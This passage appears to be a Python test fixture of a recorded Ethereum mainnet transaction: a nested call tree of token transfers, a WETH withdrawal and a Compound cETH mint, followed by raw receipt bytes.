000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac67"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x61935cbdd02287b511119ddb11aeb42f1593b7ef"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 580925,
"gas_cost": 140727,
"calldata": HexBytes(
"0x9b44d5560000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000032000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000220000000000000000000000000000000000000000000000000000000000000028000000000000000000000000000000000000000000000000000000000000002a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff103000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x95e6f48254609a6ee006f7d493c8e5fb97094cef"
),
"value": 0,
"depth": 0,
"gas_limit": 520830,
"gas_cost": 19278,
"calldata": HexBytes(
"0xa85e59e40000000000000000000000000000000000000000000000000000000000000080000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 510731,
"gas_cost": 17224,
"calldata": HexBytes(
"0x23b872dd000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000000000000000000000000000000000051c062040"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x95e6f48254609a6ee006f7d493c8e5fb97094cef"
),
"value": 0,
"depth": 0,
"gas_limit": 498588,
"gas_cost": 33079,
"calldata": HexBytes(
"0xa85e59e4000000000000000000000000000000000000000000000000000000000000008000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc80000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"
),
"value": 0,
"depth": 0,
"gas_limit": 488836,
"gas_cost": 31025,
"calldata": HexBytes(
"0x23b872dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xa26e80e7dea86279c6d778d702cc413e6cffa777"
),
"value": 6650000000000000,
"depth": 0,
"gas_limit": 456135,
"gas_cost": 20145,
"calldata": HexBytes(
"0xa3b4a32700000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x2a17c35ff147b32f13f19f2e311446eeb02503f3"
),
"value": 6650000000000000,
"depth": 0,
"gas_limit": 447162,
"gas_cost": 18173,
"calldata": HexBytes(
"0xa3b4a32700000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 13510000000000000,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 40,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 438641,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 434422,
"gas_cost": 1234,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 431535,
"gas_cost": 11880,
"calldata": HexBytes(
"0x2e1a7d4d000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 44431261990481152968,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 40,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 417416,
"gas_cost": 1234,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
"value": 44424611990481152968,
"depth": 0,
"gas_limit": 407692,
"gas_cost": 128739,
"calldata": HexBytes("0x1249c58b"),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x0c3f8df27e1a00b47653fde878d68d35f00714c0"),
"value": 0,
"depth": 0,
"gas_limit": 390245,
"gas_cost": 5403,
"calldata": HexBytes(
"0x15f2405300000000000000000000000000000000000000000000f72efd2fcf61f1e648e2000000000000000000000000000000000000000000000ad7de536f7483842c960000000000000000000000000000000000000000000000055109b1b33888dede"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002ae27d696"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 351788,
"gas_cost": 48350,
"calldata": HexBytes(
"0x4ef4c3e10000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 344510,
"gas_cost": 46370,
"calldata": HexBytes(
"0x4ef4c3e10000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 333450,
"gas_cost": 1044,
"calldata": HexBytes("0x18160ddd"),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000159c9f6f40704a"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 314737,
"gas_cost": 1253,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000003437612e40a"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 310323,
"gas_cost": 1488,
"calldata": HexBytes(
"0x70a082310000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000801e4a605b6bdde89a7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 307187,
"gas_cost": 10690,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000008bd386c2ed4798"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 277911,
"gas_cost": 2316,
"calldata": HexBytes(
"0x41c728b90000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 271782,
"gas_cost": 403,
"calldata": HexBytes(
"0x41c728b90000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x5668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 0,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x5c55b921f590a89c1ebe84df170e655a82b62126"),
"value": 0,
"depth": 0,
"gas_limit": 271185,
"gas_cost": 5060,
"calldata": HexBytes(
"0xd061ce50000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000d436f6d706f756e64426f6f7374000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000026883ed3bd1302bc8000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
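The call tree above nests arbitrarily deep through its "calls" lists, so a recursive walk is the natural way to consume it. A minimal sketch (not part of the fixture; the variable name call_tree_data is hypothetical, standing for whichever name the dict above is bound to):

def walk_calls(node, depth=0):
    # Depth-first walk over a nested call-tree dict like the one above;
    # yields one tuple per call frame. Key names match the fixture.
    yield depth, node["call_type"], node["address"], node["gas_cost"]
    for sub_call in node["calls"]:
        yield from walk_calls(sub_call, depth + 1)

# Example (assumes the dict above is bound to `call_tree_data`):
# for depth, call_type, address, gas in walk_calls(call_tree_data):
#     print("  " * depth, call_type, address.hex(), gas)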
MAINNET_RECEIPT_DICT = local_receipt_data = {
"block_number": 11279968,
"data": b"\x1c\xffy\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S<\x88D\xba\x19\"\xb8\x8d\x89*\xca\t\r\xf0\xcc\x0c)/\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc4\xf7\x08\x84{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\xdc-\x199H\x92m\x02\xf9\xb1\xfe\x9e\x1d\xaa\x07\x18'\x0e\xd5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf6P\xc3\xd8\x8d\x12\xdb\x85[\x8b\xf7\xd1\x1b\xe6\xc5ZN\x07\xdc\xc9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06zJSC\xb7M\xe2\x8c\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\xa01\x953\xc5xRz\xe6\x9b\xf7\xfa-(\x9f \xb9\xb5\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x93\\\xbd\xd0\"\x87\xb5\x11\x11\x9d\xdb\x11\xae\xb4/\x15\x93\xb7\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x8b\nm\xf6\xd3\x03\xae\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xe8\xa6\xc3\xbf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\x84Y\x87\xc8\xc8Y\xd5)1\xee$\x8d\x8d\x84\xab\x10S$\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1O\x06HC\\\xf3O\x8b\xc8\x00\xd4\xe7\x1f\xf0\xba\x15\xbcR\xdd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02j\xc5j\xd6\x07\xa6\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05 
\x9d\r\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_\xb4\xac\xca\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01u\xd9\xc1q\xa7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\xf4ra\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4{p\x94\xf3x\xe5CG\xe2\x81\xaa\xb1p\xe8\xcc\xa6\x9d\x88\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02d\x08\x10\xb1\xf0\x100\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_\xb4\xc8\x87es\xa7\x92\xd8\xfa\xba9\x1a\x98[\x93|\x96\xdf\xe36\xf8\x02\"\x85\xa4\xe5\xd5\xfa+\x07\xc3\xee\xf9\x83F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04 
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02$\xdc\x16\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4{p\x94\xf3x\xe5CG\xe2\x81\xaa\xb1p\xe8\xcc\xa6\x9d\x88\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 